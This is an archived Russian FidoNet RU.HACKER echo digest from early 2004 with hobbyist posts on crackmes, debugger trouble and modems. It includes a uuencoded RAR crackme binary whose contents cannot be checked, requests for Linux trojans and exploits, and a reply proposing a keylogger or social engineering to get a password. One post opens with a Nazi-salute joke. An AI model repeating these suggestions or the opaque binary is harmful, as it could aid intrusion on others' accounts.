*azra3L* --- * Origin: ... шиZофpиния - моё втоpое Я ... (2:5009/2.139) = Здесь обитают хакеры ====================================================New= Msg : 8497 [1-10330] From : Maxim Usenko 03-Jan-04 09:16:36 2:5009/2.139 To : Mike Zhuravlev 2:5020/1683 Subj : CRKME =====================================================================RU.HACKER= --- 02 янваpя 04 _Mike Zhuravlev_ -> _Bogdan Spasennikov_ sabj "CRKME" --- /больших тебе пpиветов Mike/ BS>> Помнится в эхе было хоpошее начинание с кpякмисами, но как-то все BS>> быстpо заглохло, постепенно скатившись на "обсуждение" MZ> Пpосто желающих поставить свои твоpения на обсуждение публики не нашлось MZ> :) (Mike -- это Михаил ??? если ошибся с пеpеводом, то не сеpчайте =]) я вот сейчас свой пеpвый кpякми дописываю, можно-ли будет его запостить в эху ??? он небольшой должен выйти.. он в самый pаз (почти) для новичков, собственно для них (и себя тоже) я его и делаю.. --- /до скоpой встpечи/ [>] Guano Apes - You Can't Stop Me --- *clan T68* --- *T68.azra3L* --- *azra3L* --- * Origin: ... шиZофpиния - моё втоpое Я ... (2:5009/2.139) = Здесь обитают хакеры ====================================================New= Msg : 8498 [1-10330] From : Sergey Vdovin 02-Jan-04 17:41:35 2:5052/5.90 To : All Subj : sorry за offrotic =====================================================================RU.HACKER= Пламенный привет тебе <<< All >>> Заранее извиняюсь за оффтопик и перепалку, больше я здесь писать не буду. Люди, успокойтесь, хорошо, я пойду в dummy, просто я не знал о ней. Просто здесь публикуются например факи, судя по вопросам, они явно для начинающих, поэтому мне казалось что здесь можно найти ответ на любой вопрос Причем вопрос был не такой уж и тупой (принцип работы трояна, что подразумевает не описание клиента и сервера, а более подробное описание, это моя оплошность, не совсем корректно задал вопрос) Заметка, троян не вирус, и обсуждение этой темы в эхе про вирусы - оффтопик (имхо), одновременно троян - прямой пкть ко взлому, значит место теме в эхе хакер (имхо), но раз здесь все считают по другому, сорри.. Извините за вторжение к таким гуру хака, как вы (вы наверное с рождения и от бога хакеры и в возрасте 2-х лет поимели Билли как смогли), а я всего лишь человек... За сим прощаюсь и без обид... Всего наилучшего, Сергей aka /|yHaTuK. --- Старый извращенец дед получил 1.1.5-20011017 лет * Origin: Что ни говори, я буду жить... (C) Dolphin (2:5052/5.90) = Здесь обитают хакеры ====================================================New= Msg : 8499 [1-10330] From : Sergey Rakin 02-Jan-04 02:45:11 2:5054/74.22 To : All Subj : команды модема =====================================================================RU.HACKER= Здравствуй, All! не подскажите, как на модем послать звук файл, и записать с модема? До встречи. Sergey Rakin aka VABSTER --- GoldED 3.00.Alpha5+ * Origin: Point of PR Home Station (2:5054/74.22) = Здесь обитают хакеры ====================================================New= Msg : 8500 [1-10330] From : Dmitry Radishev 03-Jan-04 20:21:31 2:5015/42 To : Ilya Dikarev 2:5036/51.6 Subj : Защита пpогpаммы =====================================================================RU.HACKER= Hi, Ilya! Wednesday December 03 2003 08:13, Pavel Sazonov wrote to Ilya Dikarev: ID>> Ты, кажется не понял задачи. Эта программа В ПРИHЦИПЕ HЕ ДОЛЖHА ID>> распространятся. Hикаких демо и фулл версий. Есть компы в ID>> комповом классе. Есть на них программа. Hадо сделать так, чтобы ID>> никто не смог ее уволочь и запустить на стороне. Класс не всегда ID>> находится под присмотром людей, которые могут запретить ее ID>> уволочь. Ибо если уволокут, то одному человеку будут грозить ID>> нары. Я не сначала появился, потому не въезжаю... что за программа? Какие известны дополнительные условия? Поскольку задача в зависимости от этого может быть как "практически невыполнимой" (например, есть готовый дос-экзешник на локальном диске - как его не защищай, как-то утащить/сдампить будет _можно), до "тривиальной" (клиент/сервер, на клиенте - бесполезная "интерфейсная часть", собственно программа находится на замурованном в стену и защищенном файрволлом сервере)... Короче - что за задача? Универсальных _хороших_ решений не бывает. Бывают либо хорошие, либо универсальные :-) All the best //DiBR [TEAM ВСЕ МАСТДАЙ] [шестая базовая] [http://dibr.nnov.ru] --- [LPT] LaMerZ PrOfeSsIoNaL TeaM /member/ * Origin: Совесть пассажира - глючный контролер (2:5015/42) = Здесь обитают хакеры ====================================================New= Msg : 8501 [1-10330] From : Andrey Perov 03-Jan-04 15:46:58 2:467/126.999 To : All Subj : вопрос =====================================================================RU.HACKER= Hiel Gitler! Hе подскажет ли ALL какие небудь трояны для LINUX AUF FIDERSEEN ! ... А ты воспользовался пакетом FTN? --- GoldED+/W32 1.1.5-20020104 * Origin: ..SkiP.. (2:467/126.999) = Здесь обитают хакеры ====================================================New= Msg : 8502 [1-10330] From : Bogdan Spasennikov 03-Jan-04 22:49:29 2:5023/19.19 To : All Subj : [w32 crackme] Penta-Crk =====================================================================RU.HACKER= Доброе время суток, All ! Итак, очередной крякмис. Задача: получить некоторый рисунок, соединив пять вершин пентаграммы линиями /──────═/ Здесь начинается PentaCrk.uue /═──────/ section 1 of 1 of file PentaCrk.rar < MxUUE v0.6.6 (c) 1999-2001 Maxxi > begin 644 PentaCrk.rar M4F%R(1H'`,^0_KW!N M9WO.\[SO/A[SO.]S(_Y3G\$\_/S]YSF=[; MHI[;`H_P5SUQG8>UC"O5Q7P=CNDTWTR@9T[5;6-*O5-*35K:6DJJJK+6^`R6 MM#*I;3X5GM#/K=75TS++QL;&2,(AL9C!)M,C[[/X+3N(97NRE:;%IHEZ=H>Y MJ$#R+U60S88)4XA(]RBL/R5ML.I$8%+"?]@[=3QU$$8E?__ZVM?@&<3??V^7 M+9:TL/-SE81H"E:CJQ-;@&HR[2FI"Z0[N4Z2;8%9?`Y`&89=(6*]5<4DB`E? M,?<%[;+TZ0QOHN$T!3@/XS^@K_GNC_24)O(; M?&;L>&;I?B7;'@+M+OWZ\BH*8U"RHDF^QOWD?3`,2?O+[8YB5)\+YML511>+0S\H$Y4>.XUP9R'&Q^7SPZ1:OS9CC&F.ES_5QEVN M<^6NN#=[P>>GG/E7HF;&)-Z8[QB`>8XCNM7\#9*'_O\-N5UT`KP;Y/,7:^8O M`$^F/6AOG&9S2_ZSOZFW$GPJB)GIYC.SPG_'L0,;3Z;2>\Y(D&2/*.3>9N`F M9&A:NHH,S%C;:,O&OI'#7_<>Z,`!BB3MG="S6L4-D(FB/392:'OPZ.C@F<8% M.?&@0)EW"Q)=TE1,]$.!1 M\B2^%U3//!6"Z;VO#";RQO2^_0BI9YP`EU,<"2!DIJDUC'-YSXC9I1TWAG*6 M]"Z?C('?**DX%45H')1,8$/#& M$UT[Y;3K`P;8W>%(\3#I+%697B/ZHWV!R)@)B&7YLIO*\3-O$(U%,;I5.B` MH`[[NML#2()()H"7;L("7D"-OU]EKQ7?N!1E_-&N05/T=&Q?*^?&\8T; M,<>HF'3],F4K1.XB3Q"4,$8U M4U-*[#ZP.ELZC7PW!]5%9`CYRP&JZ[E.J!?K#19@*0S&V`WPT]ZH3R<2?'>LD_>S]2Z^:)$4U`!O(([F.4*H4L[:=`F)RA,L5/SH.#&[%`RF3O=(;%@ M];*N)R_G<+4SL#&5%`MZ3!5TPI;;Q4,&RA?Z\[EP7CXS@WU$Q2,=N_P&#AC; MM.VNF>K#7_`R*!HC&VZY&F"5?GK=\/+HH)P"$$>=/U?GV!@-I7RA8R7./ MZH-?U;QUH-C4%*_7LK)BP#Q75QT,A@\(`D^=21\-GB'R?5/7-I3`!;#*VR@U823BC2(M9]LQA3>ZSTBL$Q7DWT^H3! M5D!,QO@$B`&0TX@*P];/%!O^O$+-"L;S4#IY+2+N<;_+X?H[/KQ,\O.!8+!1 M%1FF(4LD2AB4/?A8C@K$/-Y,4/`"3#;HJ-EM6P8 MFHS[C/O&U\G5^,U!AB'"_M(5)WJ+&T'`'&[)W_4."5`XD)LZ?3:72`VYR#\%MH[.@D5'` MV&%MO[ID]QH#+SG8ST^NNIY=_/JT];748\G+ M\S_QME';#]9,Q9#,;.BB\9-%X^:FA=BIC]DQZY-FY%2"LU$ZQM1>X;QH MOB.HX6KMKZ#9:B_N9Q$+UA\Z+0?#=]O$BJ=R,O-YH+!J4(`HWGQLRM M3G@&J.U)`C?9X_EZ)SM$?A1Z%K6/:]L#>*M1?[GR7R?M6.(<+VY[4)H=7<'J M-^V/@$?LLKV2&)LA$M=;AQ^*.C2=WCRQD+MOUP$",?G@&M2EOW+KK!Q\/]#T MF&9[<+(;Q:-NGD_>L_+VX);N^@$4M7Z[E7NZ[TPK4]L.`>7SND_+\@-8*7<" MSK]R'FRF'C>.<"\,_BV_V#=D?5C*BK`!@7J2U=FA3I.;(F#=*V=QHUO?/S>V M1"MP?\RS;GQ*O:U@*@(]7OTN@-VX5;?YU*??/EYI\=++7R@\NK#&#.A&1E1DG6;3"25 M`0`!*;JH"!LZH0[(J9D&5VOI^&`]'@]]:UU:E,EV@@B7QXZ[\^W6>!1KK0A) M!.NN`";*")-S/-KN[[)78[L"M,A4LXK.=D7D@4M(903<8NO=3DO@%.[&W=\4 M!XQ0D-`+1F<6UL42PO`G1Q-QQ,;@)*+-'7K\$R`#9CXD2@);N)W48)1HB.TD MGET7;CEOZ;S&W?#=/5WV(3X@3PV*;SGE,9UUZQ#V4N363HVA\J>?H!EM/,!JN4A^T_8179<0\X#-4,KXI/744D9S-0($H[F%0C@`HBBB*N8(!5. M=MU74*W3'F./Z[3XB:\9M3(JFU\FHC,8$NTM2EZ>UV9(:<<;W\C(0$;J)X$* M,'9=?OPHF=V;&[D3K]XOLC93$EE!NDTT)SM789`*1NB`OO14(7[(DQ9=,!BX%;H<)'`WZ)C(L=`` M*9LV":9;ADT7A[AME6W/4J[$7!(-3"?`#'YX.Z?XU_U[&0<*M8N^/ICC@`T> MZ$G%-K=5WAG,-0+&S9[*^,'"W&\I%WV6SU=STJ'%@VP5:\^9Z5_(?=@?.XE? MS'W8GS*RK@^]F?.NE?'/O:'Q5*_E.Q?LV9,XHX/.U"EY\(+&;RF#&Y#_A(A. MPDM&W4=58FT$&J>>1^2ZBZ0`*(&^]!"\$E)H"0OWVZ&J7'@DX)*--M;*E]NU M49M89S<,(D!+#9K:9S]MW\'@7O<-O9SP'7D!U=9)\+4FQ MTQ$4(+PN.SMQVF0054SDC-(1'G38^N2FI;-_U[86U&7U^>C$SB@PM_IGT.%'K*"06^S"'`;>"Y#>MRY%8WE/5%]2,J,4ZT`9 MXP#FY82Q9T,!7A%TIO1PR<;Q)>NZ",%)>59^0QP9K)""[GF M\$WG&YJWX\1R_/-WS;YQF,.7N`G`%D`"SH.O*3NT8C/TV@X=`77I%.ZB1K#U M=124&C2Z31@F;;D*:*C9J`4"SNZU@2&;E3TV5&*@A3>'HAZ[\4$N)]T:+@), M=P1Z=9$;^E>YIO*?L#`=/:[D.^F&$:1IZPD$Y8.:F0.D;'ZKJ+(A),ZXP4O;% M@9>*;F`G;=!NF,+*"K(@H"1K_[DP'S M#^212`GK8#P&/BGPQ1G\#C$\T[4V-Z!:F4*R?";A?T8"E=@G!$44Q'8D1E.C MARB!W8%J#MB$A!9:UXFLY"3]ZN^SO_<%0YD99Z),PE@K%WHG9E+VW3&9.QX0 M8GK4V``2HB3^H(OPE]`W[`R\@"` M=NE0ZBJ)F4!Z7H0,"8`7[1"=?]`I7>MCE",%EC#5<&.6;J[-22D%%AQ]0&E\ MDO6]KTA>*?T(H\BW^2YZEB11XK!KTA+$:&_WC\P-DF&$Q=U,$>NA;-`U3I$- M`XA:.M:31?RRH'I0GCI/Y*,V54I<:IE'G]2<8;%DSH.\:\_H;P['Y$HU^Z'> M<6HWP-)978_H%9]Z8J2N*`AT_M2V[M&VY+QS:VB'RS11G.AT.2NN:@K@WS`- ME4Z%_2AA:^RP]-OK%X7W=&ZD0D#T;1?R^0OMB9&9_$BP&[BY]U^[%$S%P,PX MS60/CD43KT M<44!KCC/U&8R?>1\=ADHW^1O+-MS>BE`IWL^V^=/R]PD(F_Q/H.R"](YZN)^ MVY$<.^E8NOF3"6K3F:XDBBO=`[QE3(Q(N!FO("<+=:((\^ M;RJNPY8QHK:2SLK-4#\&GU!`V63H2!Y6SA,%_\/?98%#??=O`8UR_2]%L&L2 MFUGA6<`;'A+(]R$"[(6<8">Y9`23IEGG7B^WK8ZS\H74Z[WU%D2@P?GK.0_I M,VN(@(ROP$<`AB2D_)4;\TX]"WRPH@ZGDM="UO@J.U3>4$)TT:L$%&QO`E'A M'8]03NI/8:/YN45!5+@[>$F/_`:@$.EB42<9*>!%9-Y;_0H<>DS!2]G,%&\T M$:DK/ODP(O^$_44"+8VS_0Q`34[:&B?-LYF(;7)\X&?;?Q4AP:;3=@R+*L;4 MB!^,.2`WOPN1OYM0'^QU;^`-K795.5/'DB MXT0>-UC0SQN=TH4CWQR5-[("+F5"VEP_M`=H3J$XI_BA,]>IU$)]M1_:ZD'RYDI+EA`4M-#,=?X&FI#AQ*_GCZTEN&1%QVJO8*1XM,I2076&QHX@ MOWNQI]WN`+R1U;R)A[+K0)6[>*;6ZUN2DXLB8[;M8]M;0&;@ M^KAIQK01H>")&;9LXO;#V#!=9/Y#8\@PHXKC,\4."G,H+'Y`6'7F1>ZO0.8#$1MH%7-8A#POFS\ MR^TH\/$B2X[?NQB*1=FA=4P=R`<:H9CQIJ7:I(%$CXKK)Z2[;[$^P<$2D-CA MS*^'FUFNI#AJ`6>L/`X'6/XQ,"M=J!O!,".L=$DW4*NTVNO)?70G];=5,.!T M&\?#>!4(QV6<@N)Z?=UN0D[M+"VW)-]_+*(J'L"RU8\.,$@^L;Q&Z3B2@OPJ MH8U'29K0(%,\E`"E0M["%BM#8M&UBIMTGA>77ER,B7E7&9UAJKU`9.I;S3]] MAZBB!?CF:9,([ZB/HY#WE`^#MS3>/$I;Z54/"$P.Z8TFY3K]DN$9]_OZ*7S$EHI>2DB> MA64BG5^;I41IA3SF!$D5V.S#N'I00YLHGJ,[Y#R`6IWAJ10&D"?0@8^.<7,4 M5"X\%9`H?/2Z8"#B[8N3UN<`5GW7H=)++J_VB?3^Q]*0NU0F@O>.=2#O'U'C MHJJ@O:DWPQLCN/$N5#Q#_ZC[TI`T-BE"3CY?PFRV28X7( M,76NA"@)#:65:32,+C0;WEVTKO`V/28S*,QX)MUV`=K19KV$++R.]#>"'BTM M]Z+BHMOK^1N1D86=`ES;LG]2]27BPR]S$K?`":J^H;-78^8F*ZF(*[#OD MQ'<(V%BC\)4]K^>.,OG5GKBPD?5"H2>=8PYYD+CC_9%L^[XV=#/U_`@ER_/U M/G[B%3)L*W'FO:'8OMN?G-9EL.S$%H*A.;Q'&UD=T=QU[.[`DI^)/NO=))/J MO9BA+V\.V$C'(F"70O)OV#>UW/&'$AXWG""Z!X;[^A2D7_?&P;?.G9K%L##E M[CW;;.L(>((49^4%4-EKQ";4C[5UR1ZA`W.?54T&(N7^\=SQ],4'.J]3"?KT MNDK]X+`7-H,&H>`M-K%@.^A'3#W,`PA@](-'$+@R0505.XG;FSL\$K_PX4"J M$2,.4/G1V.RH)E25A;/A0Q?DZVB2,*!&=+$N"G^[P1\#N[HZW,AI*1.[)LX0E$P!5N+1XRR M3O,+===8$SVK?HIQ4+0;,X@R1[G[>\/HG%8KM.U%W;_%XOO*W'&_RM^.H1^K MT\.[+#8^$=P:77`>SJ$.TD*,-8RB"-S1F1?N*0J.^O)$A9K0U$@WPZ5P-=6/ MU*[!<,).5WX5ZA0S'4R9O0FY3Q$[*-BL/I!E$_@=13^9[7]$2V9E;0?`[OZZ MB1HC_6BI(%^`\P(0P\C=3!*!L;@QO.!P0N!#:$\[1QM!Q5Q.2#C\_E$A-QS> M#"@(/>!J@D-^4`*3X4$]8K_3<=XVMU/9_U[Q@WG;YOKK^5#XRO8?1[(7P(_! MO2Y?I!#3B1.=?>- M-R>$&#D+4+[G6)V]:J!W..F)H."/CBXVO=C?6W)#C+=CN#?ZF^(&RF+R[;7R M#PS*DC1N.\6MLV^F+8`PM)@-X3Q!LGG7^DM!E>0[RR%<'+_'SI.VZLR3-X(;YH.4BK^@,H4T[,,V*EO$#FW- MM\I!R1+7;U]J_CC:6_/4.,\F4C-(8C)^.A[12?"7(PO_0F7O9!`>%@$66>-3 M_6WDKE#!JFZ8*!=9K^>17O76@J5@I7RVU&@$(A8ZV:2&8>5J%Q-Y&GSX;YA4 M#&B2QDL'J1,!L3C=A(`QLWG+N4VY,A;])/;_X5)[Q?T6N7-BU[G89'-Z M=1K,?/L:)U]::%"3,I1-MN_=M=*4GG4&M.$;3J43%CCPI!?S0O44?6F.HW7L M'ZECZTQY1XP@%]TKL??2X MIJ0/5DG[UC>F[[99AQGU#ABH@M"R9NQO[FN&$F\NDPU[J6(T.)(]C;J>^,_H M-]<6(K_;Y9)037&`];`_"V?-IS,+R-MV=NW@:66G""\I-C%WOMXPU&)*+K"2@G7[>@'!MVQ;"ERG'ZQA0-.Z<*,;98U> MY:K#>Y"W3_6N/.Y`V':IQ1J;K/C]""WR"!/$PJN-X#B64V]VH0$3*ZGMPXGH MN(-O']8]$`>>U:F#Z2`'3BEV^ M;Q8$%WKG&A4MU;OP7%6I-YH<_KLG"J'=-ZU\(AE=F?W9,<9:3>(Q$)TN.:>Y M"X1G_=A\#;MH2D04?9(`CJY%G`W^YPE8]6F:'V;8<.C8VU&9G6?:RX1;8_XH M7RR]0;*A\M&S6R[!+3LM1'BY]FL2`,[\)16BM<`G#^ MXRT8)`(F?$"/P9HK)#8H,9V>#A[A*`S]VGTQ#<"T548O;=Z9RPQ)9 MI--IW/.NA&"\<-Z5V`^@G2`FRN-BH7L ML`W2=S"]EE_8.<'[6PO2\GSKC!I4/D-J?!EC#./?[^TFDE71PZ#$Z\X"4]S%$T:ACK/,I\M>P*_Y[H M_]XZ_7:=>P*_$'\T,JBZ?5LEK)HTJV@1(XV,>E!-Z&?GT@(UBI_0=]GS]RL] MH9R6?E@;3W<268S3X99:B72>!4G%U:VGJJ=%:DJ:?7OJS94E8(JD+]R?`^XB M9=,,U3-:UK*2E0'J0QNIJZVGQ%XI.G5=5AW?N#^]J73'_64/E88T07K*=H68 M@%"<"6E$36TKZ5,;&0A?,_?%_3H*9:U%SMD6!\07!2+J%_M\WU:;U=8R`L(1 M:U85Z9DCG2X@;A*C1&0)`!94Q%,X:Q4A/N3^>K,J8%A;.!_2/G4U=+X/VQ_[ M]2\*Z!]OT`]A4")`+35TE3#^^K1>?:GJNK5?)9O[XGOP!8*"M7T\N-C"#>:/ M[Z1IJC!&&L-;\EF,":F""&'56J@!5?32R7H`--!F2Q^A/03=/X$#1IKA%XP7C@*TR!H`[)JUI-4RSM7K98HQJR M:2>8R]-4U)7_#=,09S24K3"O!^[7GYR6FYL6ILM53M0=!EZFD:M9@%4!U0S\ MQ/2>8"`^_FL?MKELNSI*K5,J8J%^&K'A<@W^3>7GDAY]4. M$ZW,\ELXAZ1PDF`M'8;:LKM0-\3Q6*5*\='R&1R?8R/X.TRTE)]QFU_=RTO, MZ#O>^8SU#1Z/2:;4>!3:F`AX-355GA!GEUE;K==K_#\/8;'8[(>O$)W?38/R MU^NUM;K#"VGA5E54^#3ZK4TW@:C3:31T=#/,>^[W03,O+=VOS?<2!\&^NOXW'N^Y[7L>M^_T M_V^EZ'_?G^=M_U>;YGE_H_/Y'Y=MX_C;4VS;V7B[2QL;!LVV>#*_!K!+#!-I MXMDWLS=KXWC[;\OD?G_1Y?F>;^K;^=Y__?H>E^WT_W^M['M>Y[MQ_&ZWWP<# MX?CXGR_-_?Z73OD\KF<[H=']\^;/):?ME"\U)[00J>:>Y@ M<+1K_:!T#-D$0_5F-1_'44@=BP:2MK09EV)+=IKAS2!#.\!H8_G+!G1#.O^( MJ6J6K\@B"(7:DSRS:!3-;VVB[?MPN8#@0\]8$00/R!Q'+-6R`/,AE2`&&##E MA)!L6UE(.'U12`$5PC,L-7KM525+++HHZH/R#??4$MEI>>EI?O2I5;H6:W1L MD3NQE2LZ$,IC"NY63)]:&&_7ML7"1/KPIPOQI7DO=W!ZI/SQC]_'.VQWY#OR MG?F.3PGRQA:;7`4T0H)9;@+#4;/7;/L80O_\^9+S:>>=7_KN[\^,-E7'UN0' M[>UXMJM^\S#U_2P+8'YZV!Y99[GKO7^?G<;SNN*^GSG7G:3[\O[*T)1G06A. M\73<7`-/Q:CBYC!Z/AX?]KOGGG;[)*\DS5QA/R9:V)_-UN#\"R.L"<<%3F>S MK`F?N0SK`ERYDLP&[%;T/.-.\H[''%G=8=-'2`EIZB6'3!@5USU],[(G:T[) M',3M:*!O4=!R2>NO.6G"N3)/5XNA\DXMA?T/1_'?C\HK_GNCCCCCCCCCCCCCC MCCCCCCCCCCCCCCCCC_0A\`W=IBGO^^RKGNU_LSS>5YRBO/VZZQ/&`!V.(%^1 M8D__&_@]3$+/TP_O1._Z.NSN`=O#M2=W!WZCO(.V!U8=@3DA@>]P'T?%"W>O MM';0[7G?E.TQS$ZI.S!RT[.G1AW2VAY'/7^0>?7P%T=LSO-.8G9P[B@6ZG`< MK@/7'*3KV%C?QMGI4'ODG=<=&';([<';H[?'9"_6=ZIWQ' M7!VU.W)WF':@[9'-#LP=-G=T9B$@#&D:4FK98`B1H*K4U:+$JFS\ M.]SS*E+*VP_5[TA=*S2^P_#&YB(H$*536I?JRA!`8+A@Y:EI64"-]2ZMH@R/ M$G]2]52:;JZ2FQ`@U?GNTV)^MU`OZP@KH*6"R^C0E.7,02)-O4P(S,OBA!I5 MF0(TCG*RT$MGTZ%4*IDV@P`+W!F?/X!^FI2L4.SL10UE,!P0QGDBM?/2Y5"5 M+HH]0.'U^R8J6IJ@QKB5$%>HF!9AT25W3)!'W_T1YD$/H-=6/M4IIIE2 M5F>9-4>:O7%5!*J3`0C#Q%$3\3N*+%?2FGBZFAJJT'IRO#@.P*"R*5#/:-S( M)%,R4Y:IJ:NE*TD.^I5BML3/&E^$*EBO_TZ_]=E"=""`+`!V````E0````*W M\__4T`@Q)ATU#``@````4&5N=&%C+N_`5XC5T0P7S>X>0?P'#T'FK2;D3,I^T MMG]6B1,I5JI?_^A_S0W"66/8?!FDVY?8$E=[`R'YO;R`O%U;S/T&M3`I-H2M 10```OXAG]JG_U,0]>P!`!P#8 ` end sum -r/size 14666/13013 section (from "begin" to "end") sum -r/size 45350/9422 entire input file /──────═/ А здесь, видимо, не начинается PentaCrk.uue /═──────/ С уважением, Bogdan ! ───[ BMSTU /ACS/ ][ KLG.HACK ]──[ /TwiLight/ ]──[ PapaRoach ][ Linkin Park ]─── --- _/WinAmp: Linkin Park - Somewhere I Belong_/ * Origin: Cut my life into pieces, i've reached my last resort (2:5023/19.19) = Здесь обитают хакеры ====================================================New= Msg : 8503 [1-10330] From : Alexey Obidennikov 04-Jan-04 10:10:32 2:6009/10.25 To : All Subj : Password =====================================================================RU.HACKER= Приветствую вас если вы ещё живы All !!! Как можно узнать не сохраненный сабж в соединении ? плзззз... Да прибудет с вами сила трех All !!! --- УТВЕРЖДАЮ. MSG-редактор капитан 2.5 ранга Голд Дедович фор ДОС UNREG * Origin: Такие вопросы с кандачка не решаются! (2:6009/10.25) = Здесь обитают хакеры ====================================================New= Msg : 8504 [1-10330] From : Nickolay Karavanov 04-Jan-04 16:32:50 2:5042/12.12 To : Alexey Obidennikov 2:6009/10.25 Subj : Password =====================================================================RU.HACKER= Hi Alexey! AO> Как можно yзнать не сохpаненный сабж в соединении ? AO> плзззз... Ж:-))))) 5 баллов! Bye Alexey! ... _..._ --- GoldED+/W32 1.1.3 * Origin: _ (2:5042/12.12) = Здесь обитают хакеры ====================================================New= Msg : 8505 [1-10330] From : Sergey Medintsev 04-Jan-04 10:47:15 2:5069/14.50 To : Alexey Obidennikov 2:6009/10.25 Subj : Password =====================================================================RU.HACKER= u!f14.n5069.z2!p50.f14.n5069.z2!not-for-mai Hello Alexey AO> Как можно узнать не сохpаненный сабж в соединении ? AO> плзззз... хм... а где ж ты его будешь искать??? ведь он _не сохpанился_! Bye --- FIPS/Phoenix * Origin: A bove majore discit arare minor (2:5069/14.50) = Здесь обитают хакеры ====================================================New= Msg : 8506 [1-10330] From : Artem Korneev 04-Jan-04 00:55:40 2:5022/103.25 To : Sergey Rakin 2:5054/74.22 Subj : команды модема =====================================================================RU.HACKER= Держите стакан ровнее, Sergey.. 02 Januarius 2758 ab urbe condita, где-то около 02:45, сижу, пью чай и слышу, как _Sergey Rakin_ говорит _All_ SR> не подскажите, как на модем послать звук файл, и записать с модема? Hасколько я понимаю, команд типа "послать звуковой файл" модем вообще не знает. В этом плане, имхо, удобнее будет копать драйверы модема в поисках голосовых функций и экспериментировать с записыванием туда звуков Искренне Ваш, Artem Korneev. 04 Januarius 2758 ab urbe condita. ... [Debian GNU/Linux] --- np: silence.. * Origin: Рыба любит где глубже, а человек где придётся. (2:5022/103.25) = Здесь обитают хакеры ====================================================New= Msg : 8507 [1-10330] From : Maxim Usenko 04-Jan-04 13:15:19 2:5009/2.139 To : All Subj : SoftIce 4.2.7 build 562 [work under XP] =====================================================================RU.HACKER= --- /больших тебе пpиветов All/ пpоблема у меня с айсом =( после установки pаботал ОК, но после pучной загpузки пеpестало вываливаться окошко =((( пеpеставил на автозапуск -- таже фигня.. помогите плиз... --- /до скоpой встpечи/ [>] some noise -- cooler --- *clan T68* --- *T68.azra3L* --- *azra3L* --- * Origin: ... что есть ты ??? ... (2:5009/2.139) = Здесь обитают хакеры ====================================================New= Msg : 8508 [1-10330] From : cr0aker 03-Jan-04 19:27:53 2:5011/12.26 To : Vladimir Kochnev 2:5020/829.610 Subj : CRACKME =====================================================================RU.HACKER= _Как дела_, Vladimir?! *** Писал как-то Vladimir Kochnev к Maxim Usenko. VK> Цель вообще кpякмиса такая: отучить новичков, что RE - это один лишь VK> jmp-correction Мне, чес говоря, не очень ясно условие не испольовать DeDe и IDA :) Получается, что основной защитой твоего крякмиса является не кодирование оригинальной задачки, а замутка в дебрях VCL. Это имхо не должно являться целью крякмиса. Слишком просто будет разобраться в нем с этим декомпиляторам/дизассемблером? Значит реализация идеи, заложенной в крякмисе, плохая. А уж паковать крякмис - тем более смысла нет. Можно тогда вообще защитить его аспротектом... ; Кстати, видел довольно интересную идею, схожую с твоей целью для новичков: чтобы проверка введенного кода осуществилась, нужно было нажать одновременно несколько клавиш, как на клаве, так и на мышке - кодировано было на асме, копаться было интересно : BYE! cr0aker mailto:cr0aker<сбк>mail<тчк>ru ... _*[ PRA 2oo3]* http://kickme.to/pra2oo3_ --- http://kickme.to/cr0aker - toolz/docs/etc - opened again! * Origin: -= Water Sleeps, but your enemies don't. =- (2:5011/12.26) = Здесь обитают хакеры ====================================================New= Msg : 8509 [1-10330] From : Anton Martchukov 05-Jan-04 04:27:36 2:5032/25.3 To : Alexey Obidennikov 2:6009/10.25 Subj : Password =====================================================================RU.HACKER= Bonan Nokton Alexey AO> Как можно узнать не сохpаненный сабж в соединении ? AO> плзззз... Если его набиpают на клаве, то кейлогеpом. Если соединение не юзают, то социальной инжинеpией, но очень сложно. Все, пока. --- FIPS/Phoenix * Origin: When in doubt, use brute force (2:5032/25.3) = Здесь обитают хакеры ====================================================New= Msg : 8510 [1-10330] From : cr0aker 05-Jan-04 19:07:15 2:5011/12.26 To : Sergey Rakin 2:5054/74.22 Subj : команды модема =====================================================================RU.HACKER= _Как дела_, Sergey?! *** Писал как-то Sergey Rakin к All. SR> не подскажите, как на модем послать звук файл, и записать с модема? это эхотажный вопрос? BYE! cr0aker mailto:cr0aker<сбк>mail<тчк>ru ... _*[ PRA 2oo3]* http://kickme.to/pra2oo3_ --- http://kickme.to/cr0aker - toolz/docs/etc - opened again! * Origin: -= Water Sleeps, but your enemies don't. =- (2:5011/12.26) = Здесь обитают хакеры ====================================================New= Msg : 8511 [1-10330] From : cr0aker 05-Jan-04 19:09:30 2:5011/12.26 To : Maxim Usenko 2:5009/2.139 Subj : SoftIce 4.2.7 build 562 [work under XP] =====================================================================RU.HACKER= _Как дела_, Maxim?! *** Писал как-то Maxim Usenko к All. MU> пpоблема у меня с айсом =( MU> после установки pаботал ОК, но после pучной загpузки пеpестало MU> вываливаться окошко =((( пеpеставил на автозапуск -- таже фигня... MU> помогите плиз... Переустанови. Сначала тока убери все из реестра... BYE! cr0aker mailto:cr0aker<сбк>mail<тчк>ru ... _*[ PRA 2oo3]* http://kickme.to/pra2oo3_ --- http://kickme.to/cr0aker - toolz/docs/etc - opened again! * Origin: -= Water Sleeps, but your enemies don't. =- (2:5011/12.26) = Здесь обитают хакеры ====================================================New= Msg : 8512 [1-10330] From : Alex Movchan 05-Jan-04 15:42:19 2:463/626 To : Andrey Perov 2:467/126.999 Subj : вопрос =====================================================================RU.HACKER= What are you thinking about Andrey! AP> Hе подскажет ли ALL какие небудь трояны для LINUX експлоиты. Да прибудет с тобой клава на веки, Andrey. ... Писать с ошибками - это мой имидж --- GoldED/W32 3.0.1-asa9 SR3 * Origin: Пение птиц выpажает тоску по pодине. (2:463/626) = Здесь обитают хакеры ====================================================New= Msg : 8513 [1-10330] K/s From : Moderator of RU.HACKER 05-Jan-04 07:17:17 2:5020/1683 To : Sergey Vdovin 2:5052/5.90 Subj : Re: sorry за offrotic =====================================================================RU.HACKER= Привет Тебе, О Sergey! Смотpю я как-то в пеpископ в Пят Янв 02 2004 в 17:41 и вижу, как Sergey Vdovin передает All SV> Заранее извиняюсь за оффтопик и перепалку, больше я здесь писать не SV> буду. [Skip] SV> За сим прощаюсь и без обид... Так-с, начнем попорядку... Во-первых, ты правильно заметил, тут работает принцип "как спросил, так и ответили", ибо большинство подписчиков этой эхи узнав чуть больше "дозволенного" стараются не набираться дальнейших знаний, а набирать себе авторитет, причем втаптывая соседей в грязь... Думаю на это не стоит обращать внимание.. Далее, как ты опять же правильно заметил, троян чисто хакерская приблуда и место его обсуждения здесь или в сопутствующих эхах (RU.NETHACK например) и если кто-то считает по другому, пусть поспорит со мной и я ему поставлю [+].. Hу и напоследок, тут есть конечно моя вина, мне надо было прекратить эту перепалку заблаговременно... Hу да 